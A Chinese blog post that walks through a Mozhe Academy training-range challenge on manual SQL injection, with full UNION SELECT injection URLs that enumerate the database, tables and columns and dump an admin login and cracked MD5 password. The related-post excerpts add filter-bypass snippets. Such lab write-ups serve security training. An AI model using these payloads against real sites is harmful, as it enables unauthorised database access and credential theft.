墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

最新推荐文章于 2022-10-03 23:10:17 发布
最新推荐文章于 2022-10-03 23:10:17 发布
阅读量1.4k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a519395243/article/details/85157121
版权

 手工注入 墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

使用sqlmap 跑,跑不出表名,所以手工注入

点击进去靶场

域名url为:   http://219.153.49.228:41774/new_list.php?id=1

 

第一步:判断是否有注入点    

http://219.153.49.228:41774/new_list.php?id=1'    出错

http://219.153.49.228:41774/new_list.php?id=1' and 1=1--+   正常   (--+ :  --为注射后面,忽略引号,+为空格)

http://219.153.49.228:41774/new_list.php?id=1‘ and 1=2 --+  为空

判断存在注入点

 

第二步:判断字段数

http://219.153.49.228:41774/new_list.php?id=1' order by 7 --+   正常

http://219.153.49.228:41774/new_list.php?id=1' order by 8 --+   出错

确定字段数为 7

 

第三步:判断数据库名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,2,3,4,5,6,7--+   确认注入显示位置

 

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,database(),3,4,5,6,7--+   显示数据库名

判断数据库名为 min_ju4t_mel1i

 

第四步: 爆表名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i'--+

表名为 (@dmin9_td4b}

 

第五步:爆列表信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'--+

列表名为 id,username,password,status

 

第六步:爆列表内 登录信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(username),group_concat(password),group_concat(status),5,6,7 from `(@dmin9_td4b}`--+

选状态为1的登录帐号和密码

既 登录帐号为 mozhe3 ,密码为 210ed648a5d14eb573b8755ceb1af330

密码md5解密 为 807362

D丶D
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 364
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
笔记:SQL过滤字符手工注入漏洞测试(第1)
m0_67399862的博客
05-26 515
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者SQL过滤字符手工注入漏洞测试(第1)
wswr的博客
03-12 1933
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
SQL Injection (GET/Search)
qq_40554015的博客
09-17 692
SQL Injection (GET/Search) 1.判断注入点 输入' 提示: near '%'' at line 1 1111' or 1=1 # 无异常 2.判断字段数 ' order by 10 # ' order by 7 # 7个字段 3.判断可显示字段: -1' union select 1,2,3,4,5,6,7 # 2,3,4,5 为可显示字段 4.爆库: -1' union select 1,datab...
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1161
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者安全专家第二代 彻底免疫未知病毒
11-02
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
墨者 - SQL过滤字符手工注入漏洞测试(第1)
吃肉唐僧的博客
07-04 1315
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
SQL手工注入漏洞测试(MySQL数据库-字符型) 墨者学院
zwish的信安之路
04-29 1764
1、打开网页,查看源码,发现停机公告那里有个url,尝试注入一下 2、?id=tingjigonggao' 发现有个函数不满足,会报错,不过既然告诉了是字符注入,再试一下: ?id=tingjigonggao' and '1'='1 发现成功显示 ?id=tingjigonggao' and '1'='2 显示有误 3、判断列数: ?id=' order by 1# 发现不行 使用?id='...
墨者学院-----SQL过滤字符手工注入漏洞测试(第3)
qq_43590351的博客
01-28 249
SQL过滤字符手工注入漏洞测试(第3) 按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常 此url种存在着字符注入 第一步判断字段数 利用order by进行判断,发现字段数是7 ?id=1' order by 7 --+ 查找回显点 ?id=-1' union select 1,2,3,4,5,6, 7 --+ http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+
墨者学院SQL过滤字符手工注入漏洞测试(第3)
没事我溜达
03-20 3035
靶场地址:SQL过滤字符手工注入漏洞测试(第3)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 我们进入靶场(这次总算是不一样的了) 首先判断注入 我们在后面加入一个单引号,发现页面报错 能做到这个靶场的都不是新手,我就不说为什么报错了,我们在后面加上注释符,即可完成闭合,使得页面显示正常 然后order by判断列数,在第8列页面不回显,那么判断数据库有7列数据 判断回显位置 查询数据库名 http://1...
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2669
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3228
很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院-SQL注入漏洞测试(布尔盲注)
qq_47094508的博客
01-23 3076
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
SQL过滤字符手工注入漏洞测试(第1)
weixin_47493074的博客
10-03 175
SQL过滤字符手工注入漏洞测试(第1)
墨者-sql手工注入漏洞测试
最新发布
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值